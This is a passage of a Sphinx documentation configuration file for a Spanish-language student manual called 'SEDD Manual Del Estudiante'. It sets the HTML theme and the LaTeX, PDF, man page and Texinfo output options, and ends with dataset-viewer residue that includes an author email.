# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# NOTE(review): 'bootstrap' is not a builtin theme; it comes from the
# third-party sphinx_bootstrap_theme package imported at the top of this file.
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'SEDD_Manual_Del_Estudiantedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto/manual]).
latex_documents = [
  ('index', u'SEDD_Manual_Del_Estudiante.tex', u'SEDD\\ Manual\\ Del\\ Estudiante Documentation',
   u'Ing. Milton Labanda, Jhymer Martínez', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# PDF output via the rst2pdf.pdfbuilder extension listed in `extensions` above.
pdf_documents = [('index', u'SEDD_Manual_Del_Estudiante',
                  u'Sphinx', u'Ing. Milton Labanda, Jhymer Martínez'),]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'sedd_manual_del_estudiante', u'SEDD_Manual_Del_Estudiante Documentation',
     [u'Ing. Milton Labanda, Jhymer Martínez'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
  ('index', 'SEDD_Manual_Del_Estudiante', u'SEDD_Manual_Del_Estudiante Documentation',
   u'Ing. Milton Labanda, Jhymer Martínez', 'SEDD_Manual_Del_Estudiante', 'One line description of project.',
   'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"jamartinezg@unl.edu.ec"
] | jamartinezg@unl.edu.ec |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.